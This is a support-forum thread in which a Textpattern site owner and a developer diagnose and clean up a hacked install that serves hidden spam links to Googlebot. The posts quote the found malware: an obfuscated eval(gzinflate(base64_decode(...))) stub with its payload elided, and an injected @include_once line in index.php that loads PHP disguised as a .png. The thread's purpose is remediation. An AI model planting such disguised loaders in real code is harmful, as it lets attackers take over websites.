Go to main content

Textpattern CMS support forum

You are not logged in. Register | Login | Help

#1 2016-08-16 11:09:50

rossharvey
Member
From: Earth. Sometimes.
Registered: 2005-03-16
Posts: 233
Website

I think my TXP install is hacked!

Help!

Google sometimes shows the text ‘This site might be hacked’ in search results. I’ve also had a couple of random messages from people saying they think it’s hacked.

It also reports a possible hack in the Goggle Console. When I fetch and render a page, the Google render shows this:

Hacked

There is no death penalty post on my site of course. When I view it myself, it looks normal.

Normal

Here’s the link:

Live link

Google Console reports these pages as possibly hacked:

http://www.rossharvey.com/blog?pg=12
http://www.rossharvey.com/slideshows/a-sunset-wedding
http://www.rossharvey.com/weddings/best-of-wedding-photography
http://www.rossharvey.com/weddings/castle-rising
http://www.rossharvey.com/weddings/crazy-bear-wedding-oxford-claire-ian
http://www.rossharvey.com/weddings/destination-wedding-photographer-hawaii-joy-george
http://www.rossharvey.com/weddings/diary-barns-norfolk
http://www.rossharvey.com/weddings/eynsham-hall-wedding
http://www.rossharvey.com/weddings/hambleton-hall-wedding
http://www.rossharvey.com/weddings/south-farm-wedding

I asked my host to scan my site and he said these pages were flagged as potentials (but not definite):

/public_html/textpattern/include/txp_plugin.php
/public_html/textpattern/lib/txplib_forms.php
/public_html/textpattern/publish.php
/public_html/textpattern/publish/log.php
/public_html/textpattern/tiny_mce/themes/simple/img/icons.php
/public_html/textpattern/tiny_mce/themes/simple/view.php
/public_html/textpattern/update/_update.php

Not good! Any ideas?

Last edited by rossharvey (2016-08-16 11:11:06)

Offline

#2 2016-08-16 12:56:20

Bloke
Developer
From: Leeds, UK
Registered: 2006-01-29
Posts: 11,250
Website GitHub

Re: I think my TXP install is hacked!

rossharvey wrote #300659:

Help!

I’ll try!

First off, yes it looks as if your site has been compromised. If you have access to curl on the command line you can prove this:

curl -A "Googlebot" www.rossharvey.com

Right at the bottom you can see hundreds of fake links like this added:

<a href='http://www.rossharvey.com/blog?pg=8'>argument essay on legalizing weed</a><br>
<a href='http://www.rossharvey.com/blog?pg=5'>professional essay editing service</a><br>
<a href='http://www.rossharvey.com/blog?pg=2'>best essay writing sites</a><br>
...

So, first thing to do if you haven’t already, is to change your passwords: your Txp admin login, MySQL and hosting/FTP passwords. Email too if it’s hosted on the same domain.

Second, backup the Txp database and make sure you download a copy of the SQL dump to your local machine.

Check your Admin->Diagnostics panel. Does it show any “changed” files in core? That lets us know if we’re dealing with something that’s modded files, or if it’s something additional that’s been installed and hooked into your site somehow.

Have a quick look at your /images folder on your host. Just scooch down the (zillions of?) files in there, scanning for anything that’s not an image. If there’s only jpgs in there, great. If there’s anything not an image, delete it. Should be clean, but you never know. I’ve seen hacks where there are files with a .png extension that actually weren’t PNGs at all but PHP files. Cheeky buggers.

You could do the same with your /files folder too, if you use it, though that’s a bit more tricky. Just check that any files you’ve stored are actually files you’ve put there and ditch anything else. You can cross-reference the files in there with the ones shown in the Content->Files panel. The ‘link files’ dropdown at the top is handy as it shows you any files in that folder that are not in your database. If the dropdown is missing, nothing’s been added.

Backup every file under your site root except your images folder (because that’ll take all week!) to your local computer, just in case you’re using plugins that have extra configuration files lurking around (e.g. glz_custom_fields).

Next, obtain a fresh copy of Txp 4.5.7 from the .com site. Delete the /textpattern folder on your host. Also delete index.php and css.php, and probably any js or css folders you have in site root. Plus anything else up there — especially PHP, CSS or JS and anything in the tmp folder. Pretty much, delete everything and just leave all the images, unless you have very good reason to need a particular file and you’re 100% sure it’s clean.

Check the local copy of your textpattern/config.php file that you downloaded is clean. It’s fairly small as you know, so should be easy to spot anything untoward. Clear out anything that may have been added.

Then upload your fresh copy of Txp — minus the setup folder — and also upload your verified config.php. Refresh your website in the browser. Unless you had plugins that used files that were deleted, everything should still show up fine. Browse a bit, check it all still works okay. If not, check your local backup for any files that might be necessary and re-upload them one by one. Check each file looks clean in a text editor first, though, in case something malicious has snuck into one of them. If you’re not sure, post anything suspicious here or send it to one of us to look at.

Then, check the whole site again with the Googlebot crawler (or a few pages with that curl command) and see if those links have gone. If so, yay! If not, we’ll need to dig deeper into your database as there may be something in your Page/Form templates. But my gut feeling is a malicious extra file or two that are being called or have been overwritten.

Check your Admin->Diagnostics panel again too. It should report clean.

Any questions, just shout and we’ll see what we can do to help.

EDIT: Once we find the infection, before you delete your local backup of your site, I’d love to take a look at any infected files along with a copy of your high diagnostics to see if I can figure out if it was Txp itself that was compromised, or a plugin, or if it’s more likely to have come from a hacked password or another piece of software on your (shared?) host.


The smd plugin menagerie — for when you need one more gribble of power from Textpattern. Bleeding-edge code available on GitHub.

Txp Builders – finely-crafted code, design and Txp

Online

#3 2016-08-16 13:53:14

rossharvey
Member
From: Earth. Sometimes.
Registered: 2005-03-16
Posts: 233
Website

Re: I think my TXP install is hacked!

Hey Stef, thanks!

I’ve changed all my passwords and backed everything up.

Image and files direcoties are clean, however spotted a rather suspicious looking file named txp_SnuTAn in tmp. Contents:

<?php
eval(gzinflate(base64_decode('TZzXrvPsdp3P***loads more stuff***96//9W//Dw==')));?>

Evil?

Also, Diagnostics:

Some Textpattern files have been modified: 
/var/sites/r/rossharvey.com/public_html/index.php, 
/var/sites/r/rossharvey.com/public_html/textpattern/lib/class.thumb.php

Pretty sure someone tweaked my broken site for me once so not sure if that’s anything to do with it. Here’s the contents:

Index.php

<?php
/*
$HeadURL: https://textpattern.googlecode.com/svn/releases/4.5.7/source/index.php $
$LastChangedRevision: 4086 $
*/

	// Make sure we display all errors that occur during initialization
        @include_once '/var/sites/r/rossharvey.com/public_html/images/banner/logo_small.png';
	error_reporting(E_ALL);
	@ini_set("display_errors","1");

	if (@ini_get('register_globals')) {
		if (isset($_REQUEST['GLOBALS']) || isset($_FILES['GLOBALS'])) {
			die('GLOBALS overwrite attempt detected. Please consider turning register_globals off.');
		}

		// Collect and unset all registered variables from globals
		$_txpg = array_merge(
			isset($_SESSION) ? (array) $_SESSION : array(),
			(array) $_ENV,
			(array) $_GET,
			(array) $_POST,
			(array) $_COOKIE,
			(array) $_FILES,
			(array) $_SERVER);

		// As the deliberately awkward-named local variable $_txpfoo MUST NOT be unset to avoid notices further down
		// we must remove any potentially identical-named global from the list of global names here.
		unset($_txpg['_txpfoo']);
		foreach ($_txpg as $_txpfoo => $value) {
			if (!in_array($_txpfoo, array(
				'GLOBALS',
				'_SERVER',
				'_GET',
				'_POST',
				'_FILES',
				'_COOKIE',
				'_SESSION',
				'_REQUEST',
				'_ENV',
			))) {
				unset($GLOBALS[$_txpfoo], $$_txpfoo);
			}
		}
	}

	define("txpinterface", "public");

	if (!defined('txpath'))
	{
		define("txpath", dirname(__FILE__).'/textpattern');
	}

	// save server path to site root
	if (!isset($here))
	{
		$here = dirname(__FILE__);
	}

	// pull in config unless configuration data has already been provided (multi-headed use).
	if (!isset($txpcfg['table_prefix']))
	{
		// Use buffering to ensure bogus whitespace in config.php is ignored
		ob_start(NULL, 2048);
		include txpath.'/config.php';
		ob_end_clean();
	}

	include txpath.'/lib/constants.php';
	include txpath.'/lib/txplib_misc.php';
	if (!isset($txpcfg['table_prefix']))
	{
		txp_status_header('503 Service Unavailable');
		exit('config.php is missing or corrupt.  To install Textpattern, visit <a href="./textpattern/setup/">textpattern/setup/</a>');
	}

	// custom caches et cetera?
	if (isset($txpcfg['pre_publish_script']))
	{
		require $txpcfg['pre_publish_script'];
	}

	include txpath.'/publish.php';
	textpattern();

?> p.

class.thumb.php is empty.

Offline

#4 2016-08-16 13:54:55

rossharvey
Member
From: Earth. Sometimes.
Registered: 2005-03-16
Posts: 233
Website

Re: I think my TXP install is hacked!

I’ll await any ideas at this point before committing to a full re-install and whatnot, this couldn’t be worse timings-wise!

(Ridiculously busy at the moment.)

Thanks so much for your help.

Offline

#5 2016-08-16 14:12:31

Bloke
Developer
From: Leeds, UK
Registered: 2006-01-29
Posts: 11,250
Website GitHub

Re: I think my TXP install is hacked!

rossharvey wrote #300662:

spotted a rather suspicious looking file named txp_SnuTAn in tmp. Contents: <?php... Evil?

Yes!

Also, your index.php is compromised. Look at the first three lines:

// Make sure we display all errors that occur during initialization
        @include_once '/var/sites/r/rossharvey.com/public_html/images/banner/logo_small.png';
    error_reporting(E_ALL);
    @ini_set("display_errors","1");

That’s not a stock part of Txp and, if you go and look at the file http://rossharvey.com/images/banner/logo_small.png it’s an obfuscated PHP file, exactly like I mentioned above. The rest of your index.php looks okay after a cursory visual scan.

So, to clean it, get rid of that tmp file you found (I’d be tempted to clean out tmp entirely), get rid of the above lines (or upload a known-good copy of index.php over the top, unless you know it’s been modded for your own needs beforehand) and remove that bogus .png file. Also look for any similar PNGs in that vicinity.

Then run some more Googlebot checks and see if there’s any leftovers. That’s your shortcut mechanism for now and saves a complete reupload, especially since Diagnostics doesn’t list any other changed files.

fwiw, class.thumb.php shouldn’t be empty, but if you’re not using Txp’s thumbnail mechanism, then maybe someone emptied out that file for you so you didn’t get a bajillion thumbnails made. I would expect on an image heavy site such as yours, that might create a huge overhead. *shrug*


The smd plugin menagerie — for when you need one more gribble of power from Textpattern. Bleeding-edge code available on GitHub.

Txp Builders – finely-crafted code, design and Txp

Online

#6 2016-08-16 14:27:12

rossharvey
Member
From: Earth. Sometimes.
Registered: 2005-03-16
Posts: 233
Website

Re: I think my TXP install is hacked!

Cleaned index.php – thanks!

That file doesn’t exist; there is no banner folder in the images directory. That evil file in the temp folder used gz compression – perhaps it was creating it on the fly?

Can you still see that fake image by the way, since I’ve deleted the dodgy one and replaced index.php?

Last edited by rossharvey (2016-08-16 14:31:16)

Offline

#7 2016-08-16 14:30:41

rossharvey
Member
From: Earth. Sometimes.
Registered: 2005-03-16
Posts: 233
Website

Re: I think my TXP install is hacked!

Thumbnails – I wondered why I had none in the images listing! Not sure I dare add it back though :¬)

Offline

#8 2016-08-16 14:32:38

rossharvey
Member
From: Earth. Sometimes.
Registered: 2005-03-16
Posts: 233
Website

Re: I think my TXP install is hacked!

All the dodgy links have gone (Googlebot curl)!

Ping me your PayPal address Stef, need to buy you some beer/coffee :¬)

Offline

#9 2016-08-16 14:38:58

rossharvey
Member
From: Earth. Sometimes.
Registered: 2005-03-16
Posts: 233
Website

Re: I think my TXP install is hacked!

Just to be sure, what should the R/W permissions be on the tmp folder? Anything else I should do to find out how it got in in the first place?

Offline

#10 2016-08-16 15:33:25

Bloke
Developer
From: Leeds, UK
Registered: 2006-01-29
Posts: 11,250
Website GitHub

Re: I think my TXP install is hacked!

rossharvey wrote #300665:

Cleaned index.php – thanks!

Cool. Yep, looks like everything’s back to normal. But I think the rabbit hole goes a little deeper. Dig with me…

That [banner] file doesn’t exist; there is no banner folder in the images directory. That evil file in the temp folder used gz compression – perhaps it was creating it on the fly?

Maybe. But I can still directly visit www.rossharvey.com/images/banner/logo_small.png and the browser still says the file “contains errors” (which is its polite way of saying it’s not a PNG it can interpret as an image, which it can’t do because it’s base64’d PHP code). I downloaded it. It’s not very friendly.

I’ve force-refreshed, so unless there’s some cacheing going on that’ll eventually flush itself out, my browser still thinks that file exists. If I alter the filename at all, even by one character, I get your front page. So if there’s no banner folder then, unless I’m very much mistaken, that leaves one avenue: it’s being redirected by an .htaccess file somewhere.

Can you have a nose around? Check if there’s an .htaccess in your /images folder. If so, open the file up in a text editor and check. As far as I can recall, there shouldn’t be one in that folder unless you’re doing something extra special to prevent hotlinking of your photos. If it’s being redirected, the endpoint will be revealed and you can go to that location in your host’s filesystem and delete the actual file it’s serving. Then, you can delete the dubious lines in there and see if you can access that URL.

If it’s not there, check the main .htaccess in site root and check there’s no sneaky redirection added to that. Again, anything odd beyond the stock one in core, delete the file it points to, get rid of the extraneous htaccess rule(s) and try again.

Just for completeness, you should check the admin side .htaccess file too; the one inside the textpattern folder. There might be nothing there, but since scripts aren’t known for their cleverness or subtlety, it might have just searched for every .htaccess file it could find.

Hope that peels back another layer of this pest.


The smd plugin menagerie — for when you need one more gribble of power from Textpattern. Bleeding-edge code available on GitHub.

Txp Builders – finely-crafted code, design and Txp

Online

#11 2016-08-16 15:45:17

Bloke
Developer
From: Leeds, UK
Registered: 2006-01-29
Posts: 11,250
Website GitHub

Re: I think my TXP install is hacked!

rossharvey wrote #300668:

Just to be sure, what should the R/W permissions be on the tmp folder?

As low as you can go. ostensibly the same as the surrounding folders, usually rwxrwxr-x (775). If you can move the tmp folder outside docroot (make a new folder somewhere, change your Admin->Preferences (Advanced) to point to it and delete the old one in the textpattern folder) then all the better.

Anything else I should do to find out how it got in in the first place?

At the moment there’s not much to go on. Could be a hacked password — yours or anyone else hosted on your server — or a compromised script/plugin that allowed elevated privileges. The created/modified datestamp on any affected or new files might give you a clue as to when it occurred, but the stamps can be faked so don’t rely on it.

Other than that, forensics on this sort of thing are kinda hard. I’d be interested to know which plugins you have installed anyway, in case I need to review any of mine as I make them ready for 4.6.0.

One other thing you could try is the smd_prognostics plugin which you can tell to monitor your filesystem (I wouldn’t advise getting it to monitor your images folder though!) It won’t necessarily detect what caused the intrusion, but it can email or alert you pretty soon afterwards if something changes so you can tend to it quickly and stamp out any intrusion like we just did. Might be worth a shot when (if) you get 10 minutes to spare from taking amazing, award-winning photographs :-)


The smd plugin menagerie — for when you need one more gribble of power from Textpattern. Bleeding-edge code available on GitHub.

Txp Builders – finely-crafted code, design and Txp

Online

#12 2016-08-16 15:58:36

rossharvey
Member
From: Earth. Sometimes.
Registered: 2005-03-16
Posts: 233
Website

Re: I think my TXP install is hacked!

Hmmm, there’s no .htaccess in the images folder. I’ve scoured the server and checked each folder and there is nothing out of place in any .htaccess.

There’s also an old online image gallery (buy photography prints) on that server but it’s not been used for a long time. I’ve checked that folder, galleries it’s called, and couldn’t find anything that looked out of place.

Happy to give you the login credentials if you’d like to have a peep yourself!

Last edited by rossharvey (2016-08-16 15:58:48)

Offline

Board footer

Powered by FluxBB